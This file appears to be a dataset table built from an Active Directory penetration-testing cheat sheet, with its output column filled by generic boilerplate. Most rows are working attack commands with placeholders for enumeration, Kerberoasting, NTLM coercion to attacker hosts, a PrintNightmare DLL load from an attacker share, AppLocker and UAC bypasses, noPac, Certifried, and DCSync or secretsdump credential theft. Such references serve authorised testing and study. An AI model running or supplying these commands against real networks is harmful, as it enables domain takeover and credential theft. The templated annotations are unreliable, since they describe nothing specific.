instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Classic Enumeration (users, shares, ACL, delegation, ...)
Bloodhound CE
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
rusthound-ce -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile.zip> -z --ldap-filter=(objectGuid=*)
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
sharphound.exe -c all -d <domain>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
SOAPHound.exe -c c:\temp\cache.txt --bhdump -o c:\temp\bloodhound-output --autosplit --threshold 900
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Enumerate Ldap
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
ldeep ldap -u <users> -p '<password>' -d <domain> -s ldap://<dc_ip> all <backup_folder>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
ldapdomaindump.py -u <user> -p <password> -o <dump_folder> ldap://<dc_ip>:389
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
ldapsearch-ad.py -l <dc_ip> -d <domain> -u <user> -p '<password>' -o <output.log> -t all
Tool or command referenced under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Enumerate DNS
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
adidnsdump -u <domain>\\<user> -p "<password>" --print-zones <dc_ip> #New targets (low hanging fruit)
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Enumerate ADCS
certify.exe find
Note or procedural step under 'Enumerate ADCS'.
Enumerate ADCS
certipy find -u <user>@<domain> -p '<password>' -dc-ip <dc_ip>
Note or procedural step under 'Enumerate ADCS'.
Enumerate SCCM
sccmhunter.py find -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug
Note or procedural step under 'Enumerate SCCM'.
Enumerate SCCM
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> sccm
Note or procedural step under 'Enumerate SCCM'.
Enumerate SCCM
SharpSCCM.exe local site-info
Note or procedural step under 'Enumerate SCCM'.
Scan Auto
from BH result
Note or procedural step under 'Scan Auto'.
Scan Auto
AD-miner -c -cf Report -u <neo4j_username> -p <neo4j_password>
Note or procedural step under 'Scan Auto'.
Scan Auto
PingCastle.exe --healthcheck --server <domain>
Note or procedural step under 'Scan Auto'.
Scan Auto
Import-Module .\adPEAS.ps1; Invoke-adPEAS -Domain '<domain>' -Server '<dc_fqdn>'
Note or procedural step under 'Scan Auto'.
Kerberoasting
MATCH (u:User) WHERE u.hasspn=true AND u.enabled = true AND NOT u.objectid ENDS WITH '-502' AND NOT COALESCE(u.gmsa, false) = true AND NOT COALESCE(u.msa, false) = true RETURN u
Note or procedural step under 'Kerberoasting'.
Kerberoasting
GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
Tool or command referenced under 'Kerberoasting'.
Kerberoasting
Rubeus.exe kerberoast
Tool or command referenced under 'Kerberoasting'.
Coerce
Drop file
Note or procedural step under 'Coerce'.
Coerce
.lnk
Note or procedural step under 'Coerce'.
Coerce
nxc smb <dc_ip> -u '<user>' -p '<password>' -M slinky -o NAME=<filename> SERVER=<attacker_ip>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Coerce
.scf
Note or procedural step under 'Coerce'.
Coerce
nxc smb <dc_ip> -u '<user>' -p '<password>' -M sucffy -o NAME=<filename> SERVER=<attacker_ip>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Coerce
.url
Note or procedural step under 'Coerce'.
Coerce
[InternetShortcut]... IconFile=\\<attacker_ip>\%USERNAME%.icon
Note or procedural step under 'Coerce'.
Coerce
Other files
Note or procedural step under 'Coerce'.
Coerce
ntlm_theft.py -g all -s <your_ip> -f test
Note or procedural step under 'Coerce'.
Coerce
Webdav
Note or procedural step under 'Coerce'.
Coerce
Enable webclient
Note or procedural step under 'Coerce'.
Coerce
.searchConnector-ms
Note or procedural step under 'Coerce'.
Coerce
nxc smb <dc_ip> -u '<user>' -p '<password>' -M drop-sc
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Coerce
add attack computer in dns
Note or procedural step under 'Coerce'.
Coerce
dnstool.py -u <domain>\<user> -p <pass> --record <attack_name> --action add --data <ip_attacker> <dc_ip>
Note or procedural step under 'Coerce'.
Coerce
Launch coerce with <attacker_hostname>@80/x as target
Note or procedural step under 'Coerce'.
Coerce
RPC call
Note or procedural step under 'Coerce'.
Coerce
printerbug.py <domain>/<username>:<password>@<printer_ip> <listener_ip>
Note or procedural step under 'Coerce'.
Coerce
petitpotam.py -d <domain> -u <user> -p <password> <listnerer_ip> <target_ip>
Note or procedural step under 'Coerce'.
Coerce
coercer.py -d <domain> -u <user> -p <password> -t <target> -l <attacker_ip>
Note or procedural step under 'Coerce'.
Coerce
Coerce kerberos
Note or procedural step under 'Coerce'.
Coerce
dnstool.py -u "<domain>\<user>" -p '<password>' -d "<attacker_ip>" --action add "<dns_server_ip>" -r "<servername>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" --tcp
Note or procedural step under 'Coerce'.
Coerce
petitpotam.py -u '<user>' -p '<password>' -d <domain> '<servername>1UWh...' <target>
Note or procedural step under 'Coerce'.
Intra ID Connect
Find MSOL
Note or procedural step under 'Intra ID Connect'.
Intra ID Connect
nxc ldap <dc_ip> -u '<user>' -p '<password>' -M get-desc-users |grep -i MSOL
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Can Connect to a computer
Lateral move
Note or procedural step under 'Can Connect to a computer'.
Exploit
know vulnerabilities
Note or procedural step under 'Exploit'.
Bypass Applocker
Get-Applocker infos
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
Get-ChildItem -Path HKLM:\SOFTWARE\Policies \Microsoft\Windows\SrpV2\Exe (dll/msi/...)
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
files in writables paths
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
C:\Windows\Temp
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
C:\Windows\Tasks
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
installutil.exe /logfile= /LogToConsole=false /U C:\runme.exe
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
mshta.exe my.hta
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
MsBuild.exe pshell.xml
Note or procedural step under 'Bypass Applocker'.
UAC bypass
Fodhelper.exe
Note or procedural step under 'UAC bypass'.
UAC bypass
wsreset.exe
Note or procedural step under 'UAC bypass'.
UAC bypass
msdt.exe
Note or procedural step under 'UAC bypass'.
Auto Enum
winPEASany_ofs.exe
Note or procedural step under 'Auto Enum'.
Auto Enum
.\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
Note or procedural step under 'Auto Enum'.
Search files
findstr /si 'pass' *.txt *.xml *.docx *.ini
Note or procedural step under 'Search files'.
Exploit
SMBGhost CVE-2020-0796
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Exploit
CVE-2021-36934 (HiveNightmare/SeriousSAM)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Exploit
vssadmin list shadows
Note or procedural step under 'Exploit'.
Webdav
open file <file>.searchConnector-ms
Note or procedural step under 'Webdav'.
Webdav
dnstool.py -u <domain>\<user> -p <pass> --record 'attacker' --action add --data <ip_attacker> <dc_ip>
Note or procedural step under 'Webdav'.
Webdav
petitpotam.py -u '<user>' -p <pass> -d '<domain>' "attacker@80/random.txt" <ip>
Note or procedural step under 'Webdav'.
Kerberos Relay
KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <computer$> -ComputerPassword <password>
Note or procedural step under 'Kerberos Relay'.
Kerberos Relay
KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <dc> -cn <computer_name>-cp <omputer_pass>
Note or procedural step under 'Kerberos Relay'.
From Service account (SEImpersonate)
RoguePatato
Note or procedural step under 'From Service account (SEImpersonate)'.
From Service account (SEImpersonate)
GodPotato
Note or procedural step under 'From Service account (SEImpersonate)'.
From Service account (SEImpersonate)
PrintSpoofer
Note or procedural step under 'From Service account (SEImpersonate)'.
From Service account (SEImpersonate)
RemotePotato0
Note or procedural step under 'From Service account (SEImpersonate)'.
MS14-068
findSMB2UPTime.py <ip>
Note or procedural step under 'MS14-068'.
MS14-068
ms14-068.py -u <user>@<domain> -p <password> -s <user_sid> -d <dc_fqdn>
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
MS14-068
msf> use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Tool or command referenced under 'MS14-068'.
MS14-068
goldenPac.py -dc-ip <dc_ip> <domain>/<user>:<password>@target
Note or procedural step under 'MS14-068'.
GPP MS14-025
msf> use auxiliary/scanner/smb/smb_enum_gpp
Tool or command referenced under 'GPP MS14-025'.
GPP MS14-025
findstr /S /I cpassword \\<domain_fqdn>\sysvol\<domain_fqdn>\policies\*.xml
Note or procedural step under 'GPP MS14-025'.
GPP MS14-025
Get-GPPPassword.py <domain>/<user>:<password>@<dc_fqdn>
Note or procedural step under 'GPP MS14-025'.
PrivExchange (CVE-2019-0724, CVE-2019-0686)
privexchange.py -ah <attacker_ip> <exchange_host> -u <user> -d <domain> -p <password>
Note or procedural step under 'PrivExchange (CVE-2019-0724, CVE-2019-0686)'.
noPac (CVE-2021-42287, CVE-2021-42278)
nxc smb <ip> -u 'user' -p 'pass' -M nopac #scan
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
noPac (CVE-2021-42287, CVE-2021-42278)
noPac.exe -domain <domain> -user <user> -pass <password> /dc <dc_fqdn> /mAccount <machine_account> /mPassword <machine_password> /service cifs /ptt
Note or procedural step under 'noPac (CVE-2021-42287, CVE-2021-42278)'.
PrintNightmare (CVE-2021-1675, CVE-2021-34527)
nxc smb <ip> -u 'user' -p 'pass' -M printnightmare #scan
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
PrintNightmare (CVE-2021-1675, CVE-2021-34527)
printnightmare.py -dll '\\<attacker_ip>\smb\add_user.dll' '<user>:<password>@<ip>
Note or procedural step under 'PrintNightmare (CVE-2021-1675, CVE-2021-34527)'.
Certifried (CVE-2022-26923)
Create account
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
certipy account create -u <user>@<domain> -p '<password>' -user 'certifriedpc' -pass 'certifriedpass' -dns '<fqdn_dc>'
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
Request
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
certipy req -u 'certifriedpc$'@<domain> -p 'certifriedpass' -target <ca_fqdn> -ca <ca_name> -template Machine
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
Authentication
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
certipy auth -pfx <pfx_file> -username '<dc>$' -domain <domain> -dc-ip <dc_ip>
Note or procedural step under 'Certifried (CVE-2022-26923)'.
ProxyNotShell (CVE-2022-41040, CVE-2022-41082)
poc_aug3.py <host> <username> <password> <command>
Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'.
ProxyNotShell (CVE-2022-41040, CVE-2022-41082)
ACLs/ACEs permissions
Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'.
Dcsync
Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts
Note or procedural step under 'Dcsync'.
Dcsync
mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Dcsync
secretsdump.py '<domain>'/'<user>':'<password>'@'<domain_controller>'
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS
Shadow Credentials
Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'.